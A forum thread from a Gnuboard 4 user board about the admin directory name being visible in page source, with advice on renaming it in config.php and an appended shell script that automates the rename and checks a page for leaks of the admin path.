
Gnuboard 4 user reviews

Sharing what you noticed while installing or using it, and your experiences, helps other users a lot.


The admin folder name is just visible..?


Just doing "view source", the g4_admin folder name is plainly visible.

I don't understand why it was done this way.

I'd say one of the basics of security is making the admin folder name hard to guess.

Of course, this could be worked around by modifying the source..

But with frequent upgrades, modifying the source becomes a burden too..

All comments

root, could you give a more detailed explanation...^^
The point is that the bbs, adm and cheditor directories created by default under the Gnuboard install directory would normally be assumed to be used as created, but that is not necessarily the case.

You can change the directory names above to whatever you want.
You can change them at first install, and you can also change them while the site is in use.

If you do change them, rename the directory and then change the directory name configured in config.php.

If the site is already in use and you want to change the admin directory from adm to something else, try the following.
(Gnuboard install directory) $  mv adm abcdefghijklmnopqrstuvwxyz
Then open config.php and change the value set in $g4[admin] from "adm" to "abcdefghijklmnopqrstuvwxyz".

^^
Even if you use root's method, when you do "view source" on a web page,
under "javascript global variables~"...
the admin path is extracted.
Of course, it's not only admin that gets printed.

What 김규덕 is saying is that, as in the reply below, when you do "view source",
all sorts of content (?!) is extracted as-is.
Yikes... I guess we should check in which cases JavaScript uses it and remove it if there are none.
Or at least find an alternative..
Set $g4[admin] in config.php to something nobody knows about.
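The following shell script is an added example, not Gnuboard's own code and not code from anyone in this thread. It automates the two steps in root's reply (move the admin directory, then change the `$g4[admin]` value in config.php) and adds the check the later comments are asking for: after the rename, does the new directory name still show up in a page's source, for example in a JavaScript global? It assumes config.php holds a line of the form `$g4[admin] = "adm";` exactly as quoted in the thread, that directory names are plain alphanumerics, and that GNU/BSD `sed`, `awk`, `grep` and `mktemp` are available. The install tree, config.php and page source it works on are constructed stand-ins built in a temporary directory.

```shell
#!/bin/sh
# Added example (not Gnuboard's own code). Automates root's two steps (mv the admin
# directory, then change $g4[admin] in config.php) and adds a leak check: does the
# renamed directory name still appear in a rendered page's source?
# Assumptions: config.php has a line of the form   $g4[admin] = "adm";   as quoted in
# the thread, and directory names contain no regex metacharacters.
set -eu

# Print the current $g4[admin] value from <install_root>/config.php.
current_admin_dir() {
    sed -n 's/^[[:space:]]*\$g4\[admin\][[:space:]]*=[[:space:]]*"\([^"]*\)".*/\1/p' "$1/config.php" | head -n 1
}

# rename_admin_dir <install_root> <new_name>
# Moves the admin directory and rewrites only the $g4[admin] line in config.php.
rename_admin_dir() {
    root=$1
    new=$2
    old=$(current_admin_dir "$root")
    [ -n "$old" ] || { echo "no \$g4[admin] line found in $root/config.php" >&2; return 1; }
    [ -d "$root/$old" ] || { echo "admin directory $root/$old does not exist" >&2; return 1; }
    [ ! -e "$root/$new" ] || { echo "$root/$new already exists, refusing to overwrite" >&2; return 1; }
    mv "$root/$old" "$root/$new"
    awk -v new="$new" '
        /^[[:space:]]*\$g4\[admin\][[:space:]]*=/ { print "$g4[admin] = \"" new "\";"; next }
        { print }
    ' "$root/config.php" > "$root/config.php.tmp"
    mv "$root/config.php.tmp" "$root/config.php"
}

# page_leaks_admin_dir <install_root> <html_file>
# Returns 0 when the configured admin directory name appears as a path segment or quoted
# string in the page (e.g. inside the JavaScript globals the thread mentions), 1 otherwise.
page_leaks_admin_dir() {
    admin=$(current_admin_dir "$1")
    grep -q -E -- "[\"'/]$admin[/\"']" "$2"
}

# Demo on a constructed stand-in for an install tree (not a real Gnuboard install).
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/adm" "$work/bbs"
    printf '%s\n' '<?php' '$g4[admin] = "adm";' '$g4[bbs] = "bbs";' '?>' > "$work/config.php"

    rename_admin_dir "$work" "abcdefghijklmnopqrstuvwxyz"
    echo "admin directory is now: $(current_admin_dir "$work")"

    # Constructed page source in the shape the thread describes: a JS global carrying the
    # admin path (the variable name is made up for this example).
    printf '%s\n' '<script>' "var g4_admin_path = \"/$(current_admin_dir "$work")/\";" '</script>' > "$work/page.html"
    if page_leaks_admin_dir "$work" "$work/page.html"; then
        echo "page.html still exposes the admin directory name in its source"
    else
        echo "page.html does not expose the admin directory name"
    fi
    rm -rf "$work"
}

demo
```

The rename itself is the easy part; the point of `page_leaks_admin_dir` is that it is the check to run against the actual HTML your site serves after the change. As the comments above note, a secret directory name is only a secret while nothing in the page source repeats it, so run the check over the saved source of a logged-in page as well as an anonymous one.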
© SIRSOFT